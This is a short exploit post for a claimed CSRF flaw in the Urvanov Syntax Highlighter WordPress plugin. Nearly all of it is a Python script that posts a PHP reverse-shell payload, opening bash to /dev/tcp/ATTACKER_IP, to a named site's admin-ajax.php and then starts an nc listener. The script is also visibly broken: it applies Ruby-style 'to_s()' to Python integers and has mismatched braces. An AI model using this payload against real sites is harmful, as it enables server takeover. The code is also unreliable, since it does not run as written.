Urvanov Syntax Highlighter <= 2.8.33 - Highlighting Blocks Mgt via CSRF

2023.10.27
E1.CODERS (IR)
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352

import requests
import os
import time

# The target URL where the Urvanov Syntax Highlighter plugin is installed
url = 'http://www.adroom.ir/wp-admin/admin-ajax.php'

# Your PHP shell payload
payload = '''
<?php exec('/bin/bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1\''); ?>
'''

# Your attacker IP and port
attacker_ip = 'ATTACKER_IP'
attacker_port = ATTACKER_PORT

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded',
    'X-Requested-With': 'XMLHttpRequest'
}

# Sending the exploit
for i in range(1, 1000):
    data = {
        'action': 'highlight_shortcode_editor_blocks',
        'code': f'<pre>${i.to_s().rjust(4, "0")}.{payload}}</pre>'
    }
    response = requests.post(url, headers=headers, data=data)
    print(f'Attempt {i}: {response.text}')
    if response.text == 'ok':
        print(f'Shell uploaded at: {i.to_s().rjust(4, "0")}.php')
        break

# Set up a listener on your attacker machine to catch the reverse shell
os.system(f'nc -lvp {attacker_port}')

source : https://www.sololearn.com/compiler-playground/cVoq838SsN5j

References:

https://wpscan.com/vulnerability/3e14d8c3-db58-43dc-bd87-20c5719d37da/

